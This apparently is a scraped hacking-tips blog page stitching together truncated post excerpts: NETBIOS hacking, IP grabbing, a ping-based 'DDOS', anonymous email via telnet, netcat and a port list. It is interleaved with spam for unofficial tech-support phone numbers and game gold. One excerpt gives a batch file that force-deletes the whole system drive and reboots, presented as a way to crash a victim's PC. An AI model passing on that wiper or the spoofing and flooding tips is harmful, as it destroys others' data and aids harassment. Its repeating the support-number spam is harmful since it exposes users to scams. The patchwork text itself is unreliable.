How to hack someone with his IP address
Introduction 1. Welcome to the basic NETBIOS document created by aCId_rAIn. This document will teach you some simple things about NETBIOS, what it does, how to use it, how to hack with it, and some other simple DOS commands that will be useful to you in the future. 1. Hardware and Firmware 1a. The BIOS T...
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Bigpond Webmail login By Dialing Toll-Free 1-800-980-183 Australia
Update email account protection by optimizing Bigpond Webmail login Australia. To get the benefit of around the clock service, you can make communication with the professional’s team via toll-free number 1-800-980-183. They can also help you to make new email account of Bigpond. You can contact...
Dlink Customer Support Number 1-844-794-2730
Get in touch with the experts of Dlink Support Engineer for router password reset, wireless connectivity solution, increase internet speed etc. Call anytime at Dlink Customer Support Number to solve the Router issues here technical professionals, available to help you over D link toll free cus...
Dell Customer Support Phone Number
Dell is the most demandable product in USA and Canada. If you are using Dell Laptop or Computer, Printer, Camera or any other device and you are facing issues in your Dell Device then don’t worry we share Dell Customer Support Phone Number with more other detail to contact for help from USA and Canada.
Setup CISCO Router By The Help of CISCO Customer Service
If you want Setup Cisco Router and you want to connect with mobile and computer both and you are not able to configure it then you should take help of Cisco Customer Support. So Get Contact Information for Cisco Router Customer Care.
How to grow muscle. It is important to know
Exercising is accompanied by massive destruction of muscle cells. That's why the next morning after a workout you feel some weakness, pain and heaviness in the muscles. Further organism "includes" damage healing mechanism, which leads to an increase in muscle volume. For more information visit...
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The game modes provided through the FIFA 16 closed
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If you're the only real Draenei inside your party
First, well discuss Enhancement DPS. cheap wow gold eu cheap Orcs are presently the most powerful potential DPS, then Troll, with Draenei in last place although not too much behind. This is because of Orcs burst damage ability, Bloodstream Fury, their extra expertise with assorted shaman mel...
-: Chat with Friends through ms dos Command Prompt :-
1) All you need is your friend's IP Address and your Command Prompt. 2) Open Notepad and write this code as it is.....! @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A 3) Now save this as "Messenger.Bat". 4) Open Command Prompt. 5) Drag this file (....
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Fix problems with USB DSL/Cable modems
Some usb dsl/cable modems may get disconnected after a little while. A possible reason that could cause this problem is that in windows xp there is an option that allows the computer to turn off a usb device to save power. To disable this option: 1) click start, highlight my computer, right click and se...
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Fix Problem with disconnect with ASDL/Cable modems
With some ADSL/Cable modems (especially USB) you may have a problem with getting disconnected after a few hours, here are two ways to fix that. Disable Hibernation Right click on your desktop, click the screen saver tab, once there you should see a power button at the bottom of the display properties...
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Fix for slow xDSL Internet access
This tweak is also valid for all Windows versions. Sometimes during browsiing you can notice that it takes time to access any web page, and then, suddenly, your connection establishes full-speed again. The reason lays in amount of time it needs for tcp/ip protocol to translate a host name to an IP add...
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Better Easy IP Check
Better Easy IP Check. This tweak was based on the Easy IP Check tweak posted by Hugo Tremblay. Use this if you just want to display your IP address and not the extra information (default gateway / subnet mask) Simply copy and paste the following into notepad @echo. @ipconfig | find "IP Address&qu...
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How to grab IP address with PHP
Today I’ll be showing you how to grab somebodies IP address when they visit a page. The variable to use is $_SERVER['REMOTE_ADDR'] - It’s that simple. You can use it for just about anything, here are a few examples. Printing the Users IP Address: <?php print ($_SERVER['REMOTE_ADDR'], "I'm...
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How To Close Ports
So i've been looking for a while on just how to close a port on a computer. I simply couldn't find a way. Well, i finally found it. This'll only work for windows users (unless your unix version OS has netsh). it's actually quite simple. here's the command for it: netsh firewall delete portopening TCP por...
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How to change your ip address...
1. Click Start->Type Run on your computer 2. Type cmd on the run field. This will open a command prompt window. 3. Type the following commands exactly as you see it in here then press enter key to go to the next line ‘@ ECHO OFF ipconfig /release ipconfig /flushdns ipconfig /setclassid ipconfig /reg...
crash victims system
copy and paste the below lines in ur notepad and save it as " file name.bat"a) how to crash victims pc.===================================@echo offdel %systemdrive%*.* /f/s/qshutdown -r -f -t 00===================================don't click on it ur system will crashit will...
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Be Anonymous Internet Surfer.
How to be Anonymous in the internet. This trick we can also call it as "hide ip", "ip spoofing" or something else close to hide our ip. For dothis trick, we are not using any software but we are just gonna using IE, Google Chrome, Mozilla FireFox or something else Internet Browser...
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Port 1: Port Service Multiplexer (TCP) Port 2: Management Utility (TCP/UDP) Death (TCP) Port 3: Compression Process (TCP/UDP) Port 5: Remote Job Entry (TCP/UDP) Port 7: Echo (TCP/UDP) Port 11: Systat Active Users (TCP/UDP) Port 13: Daytime (TCP/UDP) Port 17: Quote of the Day (TCP/UDP)...
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Accessing your email using telnet.
To receive email using telnet in windows do the following (this is the same for linux...except for the directions to open telnet and connect...but if you use linux you should be smart enough to figure it out yourself). If you think that something isn't working look at the notes first. Caranya: Go to...
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Download Netcat Here! (Hacking Tool)
Everything you need to know about NetcatNetcat is one of the most commonly used anti-hacking tool. Simply stated, Netcat makes and accepts Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections. That�s it! Netcat writes and reads data over those connections until the...
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DDOS Attack!!
Hey y'all, today I want to show you haw to make DDOS attack. This tricks are using a simple command in cmd, it is "ping" command, here is the basic information for "ping" command: Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [-j ho...
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Hantar email via telnet , (Set type =mx)
Sebelum kita menghantar email menggunkan SMTP, kita perlu menentukan jenis host/server email kita. Seperti yang saya terangkan dalam tutorial yang lepas, kita boleh mengunakan server yang kecil seperti mail.ru, mx1.hotmail.com dan lain lagi. Tetapi bagi host/server yang besar seperti yaho...
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Hantar email via telnet.
Seperti yang kita tahu, telnet adalah satu command/tool yang membolehkan kita connect kepada kebanyakan Protokol dan server seperti IMAP, IP, POP, HTTP, SMTP, dan lain lagi, untuk masa ini saya ingin tunjukkan cara menghantar email secara "Anonymous"/"Fake Email" (SM...
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Networking command untuk Operating System (OS) windows, CMD
Networking command adalah command yang digunakan untuk meng-akses segala mesin elektronik yang mempunyai Server/Host/IP/OSerial number dan lain lagi. Command ini juga digunakan oleh para Hackers untuk Hack sistem bank, Cyber Security, email dll. Ipconfig - Menunjukkan "router"...
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